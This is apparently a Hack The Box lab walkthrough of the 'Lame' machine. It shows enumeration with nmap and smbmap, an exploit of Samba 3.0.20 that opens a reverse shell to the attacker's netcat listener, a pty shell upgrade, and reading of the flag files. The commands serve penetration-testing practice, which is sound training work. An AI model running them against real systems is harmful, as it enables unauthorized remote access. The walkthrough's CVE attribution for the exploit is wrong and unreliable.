Created by ch4p // 10.10.10.3
// Enumeration //
Lame was the first machine to be published on Hackthebox, and is a very simple boot-to-root box. I’ll be kicking things off with an nmap scan, grabbing open ports and service versions. The syntax below will run a TCP connect scan on all 65,535 ports, run all the default NSE scripts, as well as verbosely print out it’s status.
nmap -Pn -A -p- -v 10.10.10.3
It may take a few minutes, however, you should get a return similar to the photo above. The two main takeaways from this is vsftpd (ver 2.3.4) running on port 21, and Samba (ver 3.0.20) on port 139 and 445. Let’s use SMBmap to take a deeper look into the Samba service.
smbmap -H 10.10.10.3
For those of you unfamiliar, Samba is suite of interoperability utilities to allow Linux machines to function in an Active Directory environment, utilizing the SMB/CIFS protocol. According to our output, we have Read and Write access to the tmp share.
A quick Google search returns CVE-2007-6015, a buffer overflow exploit affecting versions 3.0.0 – 3.0.27a, allowing unauthenticated remote users to execute arbitrary code. Note, there are numerous exploits for this service and version, I recommend filtering by score.
// Exploitation //
A Metasploit module does exist for this CVE, but first, let’s do it without. Going back to trusty Google and searching CVE-2007-6015 turns up a well written and documented python script created by amriunix that should do the trick.
python usermap_script.py 10.10.10.3 139 10.10.10.x 2901
Clone the script, and substitute x for your own IP, and you’re ready to have a good time. You’ll need a netcat listener to catch the shell.
nc -lvnp 2901
We have a shell, and as root. A raw netcat shell isn’t the most useful, so we’ll see if we can spawn a bit better one using python.
python -c 'import pty; pty.spawn("/bin/sh")'
From here, we’re already root, so it’s the simple matter of grabbing the flags from the root and user directories.
cat /root/root.txt
cat /home/makis/user.txt
Or we can do all of this the lazy way. Fire up Metasploit, let’s point and click.